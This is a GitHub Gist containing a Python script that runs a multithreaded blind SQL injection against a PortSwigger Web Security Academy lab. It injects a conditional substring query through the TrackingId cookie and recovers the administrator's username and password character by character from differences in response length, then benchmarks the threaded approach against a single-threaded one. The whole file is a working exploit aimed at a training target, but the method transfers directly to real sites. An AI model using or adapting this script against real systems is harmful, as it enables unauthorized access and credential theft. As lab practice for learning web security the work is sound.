Last active
April 11, 2020 11:40
-
-
Save Grezzo/6fc760b96a60a61220fa1cbe718f44cc to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
import threading | |
def do_sql_injection(charset, length, function): | |
"""Uses *many* threads to conduct a blind SQL injection attack as fast as | |
possible. | |
Positional arguments: | |
function -- A function that returns True or False for each character and | |
index supplied | |
charset -- The character set to submit to each index | |
length -- The length of the value to be extracted""" | |
def _check(function, index, char, results): | |
if function(char, index): | |
results[index] = char | |
results = [''] * length | |
threads = [] | |
for index in range(length): | |
for char in charset: | |
thread = threading.Thread( | |
target=_check, | |
args=(function, index, char, results)) | |
thread.start() | |
threads.append(thread) | |
for thread in threads: | |
thread.join() | |
return ''.join(results) | |
def main(): | |
from datetime import datetime as dt | |
import requests | |
import string | |
import sys | |
url = ('https://[redacted].web-security-academy.net') | |
baseline = len(requests.get(url).content) | |
def is_char_at_index(char, index, column, live_results): | |
"""This function uses the blind SQL inject lab provided by portswigger | |
as an the URL to exploit. See https://portswigger.net/web-security | |
/sql-injection/blind/lab-conditional-responses""" | |
injection = ( | |
"'OR(SELECT substr({},{},1)FROM users WHERE " | |
"username='administrator')='{}").format(column, index+1, char) | |
cookies = {'TrackingId': injection} | |
response = requests.get(url, cookies=cookies) | |
if len(response.content) > baseline: | |
if live_results: | |
display_char(char, index) | |
return True | |
def is_username_char_at_index(char, index): | |
return is_char_at_index(char, index, 'username', False) | |
def is_password_char_at_index(char, index): | |
return is_char_at_index(char, index, 'password', False) | |
def is_password_char_at_index_live(char, index): | |
return is_char_at_index(char, index, 'password', True) | |
def display_placeholder(length): | |
sys.stdout.write('\x1b[31m{}\x1b[0m\r'.format('_' * length)) | |
sys.stdout.flush() | |
def display_char(char, index): | |
sys.stdout.write('{}\x1b[32m{}\x1b[0m\r'.format('\x1b[C'*index, char)) | |
sys.stdout.flush() | |
length = 6 | |
charset = string.ascii_letters + string.digits | |
print('Starting operation using do_sql_injection()') | |
display_placeholder(length) | |
start = dt.now() | |
result = do_sql_injection(charset, length, is_password_char_at_index_live) | |
print() | |
end = dt.now() | |
dsi_time = end - start | |
print('Result is {}'.format(result)) | |
print('Operation took {}\n'.format(dsi_time)) | |
print('Starting operation using single thread') | |
display_placeholder(length) | |
start = dt.now() | |
results = [] | |
for index in range(length): | |
for char in charset: | |
if is_password_char_at_index_live(char, index): | |
results.append(char) | |
break | |
result = ''.join(results) | |
print() | |
end = dt.now() | |
st_time = end - start | |
print('Result is {}'.format(result)) | |
print('Operation took {}\n'.format(st_time)) | |
print('do_sql_injection was {} times faster!\n'.format(st_time/dsi_time)) | |
print(( | |
'Getting two fields at the same time using threads around ' | |
'do_sql_injection()')) | |
def get_password(): | |
results['password'] = do_sql_injection( | |
charset, 6, is_password_char_at_index) | |
def get_username(): | |
results['username'] = do_sql_injection( | |
charset, 13, is_username_char_at_index) | |
results = {'username': None, 'password': None} | |
threads = [ | |
threading.Thread(target=get_password), | |
threading.Thread(target=get_username)] | |
start = dt.now() | |
for thread in threads: | |
thread.start() | |
for thread in threads: | |
thread.join() | |
end = dt.now() | |
dsi_time = end - start | |
print(results) | |
print('Operation took {}\n'.format(dsi_time)) | |
if __name__ == '__main__': | |
main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment